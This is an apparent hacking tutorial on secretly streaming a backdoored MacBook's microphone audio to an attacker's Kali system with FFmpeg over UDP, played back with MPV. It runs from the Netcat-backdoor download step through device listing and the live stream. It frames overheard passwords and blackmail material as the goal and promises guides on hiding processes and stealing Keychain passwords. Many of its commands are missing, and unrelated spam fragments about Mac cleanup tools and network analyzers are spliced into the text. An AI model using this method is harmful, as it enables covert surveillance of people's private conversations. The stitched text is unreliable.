Google, Amazon, and Facebook are always listening. But what's worse? Hackers are listening, too. Windows PCsare particularly vulnerable, but with a few simple commands, a remote attacker can even take over the microphone on someone's Mac computer, streaming audio and listening to private conversations in real time without the victim's knowledge, abusing an overlooked security consideration.
After an attacker has established a backdoor on a vulnerable MacBook or compromised the device remotely using a fake PDF, they can use modern post-exploitation frameworks like Empire or Metasploit to execute a variety of different attacks. This time, I'll show a stealthier method of listening to audio using the victim's microphone by utilizing an application called FFmpeg.
- Don't Miss: How to Configure a Backdoor on Anyone's MacBook
How This Eavesdropping Attack Works
FFmpeg is a multimedia framework able to decode, encode, transcode, convert, stream, and play most formats on Windows, macOS, and Unix-based distributions.
This tool will be installed on both the backdoored MacBook and the attacker's Kali system. A listening server will be hosted on the attacker's side, and audio will be sent from the victim's MacBook to the attacker's system. The attacker will then be able to tap into the stream created by FFmpeg and hear everything in the surrounding area of the compromised MacBook.
Five free network analyzers worth any IT admin's time Solid information leads to a strong and worry-free network. Jack Wallen lists five tools that can get you that solid information for free. Re: Video streaming - Measuring realtime bitrate. AttaBoy2 Mar 24, 2009 8:33 PM ( in response to Newsgroup_User ) I can think of a crude way to do it.
Overheard information may include private conversations where a victim divulges a password or secret to someone in the room, personal information shared during phone calls, or conversations which can be later used for blackmail. This information is highly valuable to a remote attacker looking to further exploit the victim's personal and digital life, associates and family, and work colleagues.
Step 1: Install FFmpeg in Kali
On the attacker's Kali Linux system, FFmpeg can be installed using the apt-get install ffmpeg command, as seen below.
Step 2: Configure the FFmpeg Server
To receive an incoming audio stream, FFmpeg will need to be configured on the attacker's system. The below command can be used to start FFmpeg.
This command will instruct FFmpeg to open UDP port (udp://) 9999 and accept input (-i) on every available interface (0.0.0.0). It will then save the audio stream to the /tmp directory in MP3 format with the filename outputFile.mp3. The port number (9999), save directory (/tmp), and output filename can, of course, be changed as needed. For this demonstration, I'm using easy-to-remember values.
That's it for setting up FFmpeg on the attacker's system. Next, I'll show how to configure FFmpeg on the backdoored MacBook.
Step 3: Install FFmpeg on the Backdoored MacBook
FFmpeg is capable of capturing audio through Apple's AVFoundation, a fully featured framework for working with media on iOS, macOS, and watchOS. Using AVFoundation, users can play, create, and edit media files, as well as build powerful media functionality into applications.
From the Netcat backdoor on the MacBook, use cURL to download FFmpeg and save the ZIP to the /tmp directory. This can be done using the below command. To avoid arousing suspicion in the victim user, a directory other than /tmp can be used on the target MacBook.
When the download is complete, use the unzip /tmp/ffmpeg.zip command to extract the files, as seen below.
A new directory called 'ffmpeg-4.0-macos64-static/' will be created. In this directory is a bin/ directory containing the ffmpeg binary. Change into the bin/ directory using the cd command.
Ensure the ffmpeg binary has permission to execute on the MacBook using the chmod command.
Then, list the available input devices on the MacBook using the ./ffmpeg -f avfoundation -list_devices true -i ' command, as seen below.
This command will force (-f) FFmpeg to use the AVFoundation format and list (-list_devices) all available input (-i ') devices in the MacBook. AVFoundation uses the convention 'Video:Audio,' so capturing audio using the built-in microphone would appear as ':1' in the next command because the microphone is assigned to the '1' audio device.
To capture audio using the built-in microphone, run the below command from a Netcat shell on the backdoored MacBook.
Remember, the input source may appear as '0' or '2' on other MacBook devices. The force format (-f) is used again to specify the output format (MP3) and sends the audio stream to the attacker's UDP address on port 9999.
From the Netcat backdoor, the below output will continue to generate data pertaining to the data stream.
Back on the attacker's server, the FFmpeg terminal will display audio data and begin saving the audio to the specified (/tmp) directory.
Chrome Cleanup Tool For Mac
As long as the FFmpeg terminals are running on both machines, the MacBook microphone will continue to send and save audio to the attacker's server.
Step 4: Install MPV & Listen to Streaming Audio
Kaspersky Removal Tool For Mac
The final step is to tap into the audio stream. This can be done using MPV, a terminal-based application capable of playing audio from the command line. Use the apt-get install mpv command to install MPV in Kali.
Finally, use the mpv --keep-open=yes /tmp/outputFile.mp3 command to begin listening to the audio, as such:
The --keep-open argument isn't required. It will keep the MPV command from closing in the event it reaches the end of the file.
As mentioned, FFmpeg will continue to write audio data to the outputFile.mp3. As MPV is playing audio in real time, it occasionally reaches the end of the file before FFmpeg can process the streaming the audio. This is similar to how YouTube videos need to buffer before they can be played. MPV can't play audio if FFmpeg isn't done processing it. I would recommend leaving a 5–10-second buffer in the MPV terminal for a seamless (nearly real time) streaming experience.
How to Protect Against Audio Streaming Attacks
There's a good chance that antivirus software won't defend against such attacks, since FFmpeg isn't considered a malicious application and doesn't attempt to change any files on the computer or open ports.
Other than frequently checking for suspicious processes using top or ps, there's not a whole lot that can be done. In a future guide, I'll actually be showing how to hide such processes from active user detection, so those aren't surefire ways to detect abuse anyway.
Snippet Tool For Mac
A last-ditch way to protect yourself against eavesdroppers is to just disconnect the cable for the built-in microphone in the MacBook, iMac, or other Mac computer, then rely solely on third-party desktop microphones or headphones with built-in mics that you can easily disconnect when not in use. This will at least limit your exposure to possible eavesdropping attacks.
Stay Tuned for More macOS Hacks
That's it for streaming audio from a backdoored MacBook using FFmpeg and MPV. In upcoming articles, I'll show how to dump Keychain passwords, capture keystrokes, hack iCloud passwords, and utilize many of the Empire and Metasploit post-exploitation modules to further hack MacOS devices.
Don't Miss: How to Steal Signal Conversations from a MacBook with a USB Rubber Ducky
- Follow Null Byte on Twitter, Flipboard, and YouTube
- Sign up for Null Byte's weekly newsletter
- Follow WonderHowTo on Facebook, Twitter, Pinterest, and Flipboard